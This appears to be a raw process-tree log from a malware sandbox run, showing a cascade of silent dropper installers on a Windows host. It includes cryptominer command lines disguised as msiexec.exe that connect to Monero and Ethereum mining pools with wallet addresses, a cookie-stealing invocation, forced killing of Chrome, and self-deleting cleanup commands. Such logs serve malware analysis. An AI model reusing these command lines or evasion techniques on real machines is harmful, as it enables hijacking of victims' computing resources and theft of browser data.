C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cpfktosy.mkh\askinstall31.exe & exit15⤵PID:6288
-
C:\Users\Admin\AppData\Local\Temp\cpfktosy.mkh\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\cpfktosy.mkh\askinstall31.exe16⤵PID:6168
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:6396
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:6756
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4noi2kle.sdj\GcleanerWW.exe /mixone & exit15⤵PID:7024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exe & exit15⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exe16⤵PID:7084
-
C:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exe17⤵PID:804
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gj4f5ioc.g2l\setup_10.2_mix.exe & exit15⤵PID:8148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gfqrtao3.uly\file.exe & exit15⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\gfqrtao3.uly\file.exeC:\Users\Admin\AppData\Local\Temp\gfqrtao3.uly\file.exe16⤵PID:7284
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"17⤵PID:7528
-
C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:7628
-
C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe" 1 3.1617560834.606a0502bb084 10119⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe" 2 3.1617560834.606a0502bb08420⤵PID:5228
-
C:\Users\Admin\AppData\Local\Temp\lm2n5jnuvh3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\lm2n5jnuvh3\Setup3310.exe" /Verysilent /subid=57721⤵PID:5624
-
C:\Users\Admin\AppData\Local\Temp\is-LSOG0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-LSOG0.tmp\Setup3310.tmp" /SL5="$B0352,138429,56832,C:\Users\Admin\AppData\Local\Temp\lm2n5jnuvh3\Setup3310.exe" /Verysilent /subid=57722⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\is-5N3K8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5N3K8.tmp\Setup.exe" /Verysilent23⤵PID:8972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zb1omnwl5mw\app.exe"C:\Users\Admin\AppData\Local\Temp\zb1omnwl5mw\app.exe" /8-2321⤵PID:8168
-
-
C:\Users\Admin\AppData\Local\Temp\aano405toc5\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\aano405toc5\cpyrix.exe" /VERYSILENT21⤵PID:6048
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵PID:8352
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵PID:8520
-
-
-
C:\Users\Admin\AppData\Local\Temp\cj44shdszrk\vict.exe"C:\Users\Admin\AppData\Local\Temp\cj44shdszrk\vict.exe" /VERYSILENT /id=53521⤵PID:6200
-
C:\Users\Admin\AppData\Local\Temp\is-3BKIF.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-3BKIF.tmp\vict.tmp" /SL5="$C02DE,870426,780800,C:\Users\Admin\AppData\Local\Temp\cj44shdszrk\vict.exe" /VERYSILENT /id=53522⤵PID:4868
-
C:\Users\Admin\AppData\Local\Temp\is-TV3RA.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-TV3RA.tmp\win1host.exe" 53523⤵PID:8464
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xqunrxhzimf\i1szggspaax.exe"C:\Users\Admin\AppData\Local\Temp\xqunrxhzimf\i1szggspaax.exe" /ustwo INSTALL21⤵PID:1872
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\41RRLKT8OO\setups.exe"C:\Users\Admin\AppData\Local\Temp\41RRLKT8OO\setups.exe" ll18⤵PID:7864
-
C:\Users\Admin\AppData\Local\Temp\is-990EI.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-990EI.tmp\setups.tmp" /SL5="$305AC,454998,229376,C:\Users\Admin\AppData\Local\Temp\41RRLKT8OO\setups.exe" ll19⤵PID:7808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"17⤵PID:8040
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:6196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:6408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"17⤵PID:6432
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:3444
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:8036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"17⤵PID:2876
-
C:\Users\Admin\AppData\Roaming\42D8.tmp.exe"C:\Users\Admin\AppData\Roaming\42D8.tmp.exe"18⤵PID:7932
-
-
C:\Users\Admin\AppData\Roaming\3FDA.tmp.exe"C:\Users\Admin\AppData\Roaming\3FDA.tmp.exe"18⤵PID:5624
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w5285 --cpu-max-threads-hint 50 -r 999919⤵PID:7416
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w13507@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:6288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"18⤵PID:6688
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:8360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"17⤵PID:6372
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jj1sea4l.f5h\app.exe /8-2222 & exit15⤵PID:7452
-
C:\Users\Admin\AppData\Local\Temp\jj1sea4l.f5h\app.exeC:\Users\Admin\AppData\Local\Temp\jj1sea4l.f5h\app.exe /8-222216⤵PID:6828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wjko5zm.jdx\Four.exe & exit15⤵PID:7780
-
C:\Users\Admin\AppData\Local\Temp\5wjko5zm.jdx\Four.exeC:\Users\Admin\AppData\Local\Temp\5wjko5zm.jdx\Four.exe16⤵PID:8960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8d-af2ef-99f-e6086-4f355d4dedbde\Vikicyqogy.exe"C:\Users\Admin\AppData\Local\Temp\8d-af2ef-99f-e6086-4f355d4dedbde\Vikicyqogy.exe"14⤵PID:5764
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:5340
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:3420
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:2012
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:5372
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:5804
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:6024
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"11⤵PID:5476
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:4692
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe" 1 3.1617560700.606a047c4acf0 10313⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe" 2 3.1617560700.606a047c4acf014⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\im1rbhghwsm\szboepf3njv.exe"C:\Users\Admin\AppData\Local\Temp\im1rbhghwsm\szboepf3njv.exe" /ustwo INSTALL15⤵PID:6184
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "szboepf3njv.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\im1rbhghwsm\szboepf3njv.exe" & exit16⤵PID:6792
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "szboepf3njv.exe" /f17⤵
- Kills process with taskkill
PID:6264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rkwt1n3ytrz\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\rkwt1n3ytrz\Setup3310.exe" /Verysilent /subid=57715⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\is-UNK3C.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UNK3C.tmp\Setup3310.tmp" /SL5="$70296,138429,56832,C:\Users\Admin\AppData\Local\Temp\rkwt1n3ytrz\Setup3310.exe" /Verysilent /subid=57716⤵PID:6480
-
C:\Users\Admin\AppData\Local\Temp\is-0DCC7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0DCC7.tmp\Setup.exe" /Verysilent17⤵PID:6456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\43uwmvbktwv\vict.exe"C:\Users\Admin\AppData\Local\Temp\43uwmvbktwv\vict.exe" /VERYSILENT /id=53515⤵PID:6420
-
C:\Users\Admin\AppData\Local\Temp\is-I1IMS.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-I1IMS.tmp\vict.tmp" /SL5="$4037C,870426,780800,C:\Users\Admin\AppData\Local\Temp\43uwmvbktwv\vict.exe" /VERYSILENT /id=53516⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\is-DQFSJ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-DQFSJ.tmp\win1host.exe" 53517⤵PID:4360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yufbngzsmsj\app.exe"C:\Users\Admin\AppData\Local\Temp\yufbngzsmsj\app.exe" /8-2315⤵PID:6552
-
-
C:\Users\Admin\AppData\Local\Temp\ocunfqt1vzp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ocunfqt1vzp\vpn.exe" /silent /subid=48215⤵PID:6460
-
C:\Users\Admin\AppData\Local\Temp\is-QPGS5.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-QPGS5.tmp\vpn.tmp" /SL5="$702FC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ocunfqt1vzp\vpn.exe" /silent /subid=48216⤵PID:6840
-
-
-
C:\Users\Admin\AppData\Local\Temp\3qiuxb3sxoj\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\3qiuxb3sxoj\cpyrix.exe" /VERYSILENT15⤵PID:6716
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:4536
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"17⤵PID:5552
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:6980
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:4904
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8ZZV2QJ5ON\setups.exe"C:\Users\Admin\AppData\Local\Temp\8ZZV2QJ5ON\setups.exe" ll12⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\is-99R65.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-99R65.tmp\setups.tmp" /SL5="$90138,454998,229376,C:\Users\Admin\AppData\Local\Temp\8ZZV2QJ5ON\setups.exe" ll13⤵PID:5720
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:5420
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\erezwwg3i4s\vpn.exe"C:\Users\Admin\AppData\Local\Temp\erezwwg3i4s\vpn.exe" /silent /subid=4828⤵PID:4200
-
C:\Users\Admin\AppData\Local\Temp\is-795U3.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-795U3.tmp\vpn.tmp" /SL5="$202CE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\erezwwg3i4s\vpn.exe" /silent /subid=4829⤵PID:2464
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:4224
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:2224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:3084
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:2548
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:7816
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:8180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\if2t45oqm5a\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\if2t45oqm5a\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:3464
-
C:\Users\Admin\AppData\Local\Temp\is-I2LKK.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-I2LKK.tmp\IBInstaller_97039.tmp" /SL5="$202AA,14575146,721408,C:\Users\Admin\AppData\Local\Temp\if2t45oqm5a\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:4740
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-L1JTL.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:4600
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-L1JTL.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:4060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pczxidfgqxh\1pjbt2roasz.exe"C:\Users\Admin\AppData\Local\Temp\pczxidfgqxh\1pjbt2roasz.exe" /quiet SILENT=1 AF=7568⤵PID:4468
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pczxidfgqxh\1pjbt2roasz.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pczxidfgqxh\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617301089 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\hfun0f1lgcb\vict.exe"C:\Users\Admin\AppData\Local\Temp\hfun0f1lgcb\vict.exe" /VERYSILENT /id=5358⤵PID:3552
-
-
C:\Users\Admin\AppData\Local\Temp\ojwqmossmjm\xfjdenofpfx.exe"C:\Users\Admin\AppData\Local\Temp\ojwqmossmjm\xfjdenofpfx.exe"8⤵PID:5096
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ojwqmossmjm\xfjdenofpfx.exe"9⤵PID:4700
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4760
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\TG2XKYFGOM\setups.exe"C:\Users\Admin\AppData\Local\Temp\TG2XKYFGOM\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\is-NEQ8L.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-NEQ8L.tmp\setups.tmp" /SL5="$4013C,454998,229376,C:\Users\Admin\AppData\Local\Temp\TG2XKYFGOM\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4044
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"4⤵PID:4504
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4648
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4792
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4704
-
C:\Users\Admin\AppData\Roaming\44BA.tmp.exe"C:\Users\Admin\AppData\Roaming\44BA.tmp.exe"5⤵PID:2736
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w4645 --cpu-max-threads-hint 50 -r 99996⤵PID:4620
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w3971@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4084
-
-
-
C:\Users\Admin\AppData\Roaming\4671.tmp.exe"C:\Users\Admin\AppData\Roaming\4671.tmp.exe"5⤵PID:4764
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\4671.tmp.exe6⤵PID:6988
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6508
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:4488
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:1668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:5708
-
C:\ProgramData\5438239.exe"C:\ProgramData\5438239.exe"5⤵PID:6692
-
-
C:\ProgramData\141477.exe"C:\ProgramData\141477.exe"5⤵PID:5376
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:6584
-
-
-
C:\ProgramData\6536977.exe"C:\ProgramData\6536977.exe"5⤵PID:7108
-
C:\ProgramData\6536977.exe"{path}"6⤵PID:8116
-
-
-
C:\ProgramData\4408264.exe"C:\ProgramData\4408264.exe"5⤵PID:6208
-
C:\ProgramData\4408264.exe"{path}"6⤵PID:7676
-
-
C:\ProgramData\4408264.exe"{path}"6⤵PID:7728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4564
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7928
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4020
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2464
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\is-OK414.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-OK414.tmp\vict.tmp" /SL5="$402BE,870426,780800,C:\Users\Admin\AppData\Local\Temp\hfun0f1lgcb\vict.exe" /VERYSILENT /id=5351⤵PID:3788
-
C:\Users\Admin\AppData\Local\Temp\is-G4JST.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-G4JST.tmp\win1host.exe" 5352⤵PID:5060
-
C:\Users\Admin\AppData\Local\Temp\5Uca2fsrj.exe"C:\Users\Admin\AppData\Local\Temp\5Uca2fsrj.exe"3⤵PID:7652
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵PID:7700
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif4⤵PID:3400
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe5⤵PID:7552
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4732
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EF1ECA95A6EF642FABE37BE017811553 C2⤵PID:5104
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DEBDBF91AF62CC0B692F7813AD7ADA942⤵PID:1272
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6028
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5408
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6472
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6944
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6368
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6588
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5624
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6220
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6476
-
